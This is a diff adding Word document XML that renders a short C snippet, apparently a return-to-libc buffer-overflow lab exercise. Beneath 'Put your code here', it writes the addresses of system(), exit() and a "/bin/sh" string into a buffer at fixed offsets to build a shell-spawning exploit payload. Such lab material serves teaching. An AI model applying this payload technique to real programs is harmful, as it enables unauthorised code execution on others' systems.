+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>/* You need to fill the buffer with appropriate contents here */</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>/* ... Put your code here ... */</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="8000FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>long</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>*</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>tmp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="8000FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>long</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>*)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> buffer</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>*(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>tmp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>+</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="FF8000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>9</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="FF8000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>0xb7e42da</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="FF8000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>0</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve">   </w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>//  system()</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>*(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>tmp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>+</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="FF8000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>10</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="FF8000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>0xb7e369d</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="FF8000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>0</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve">   </w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>//  exit()</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>*(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>tmp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>+</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="FF8000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>11</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="FF8000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>0xb7f6382</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="FF8000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>b</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve">   </w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>//  "/bin/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>sh</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
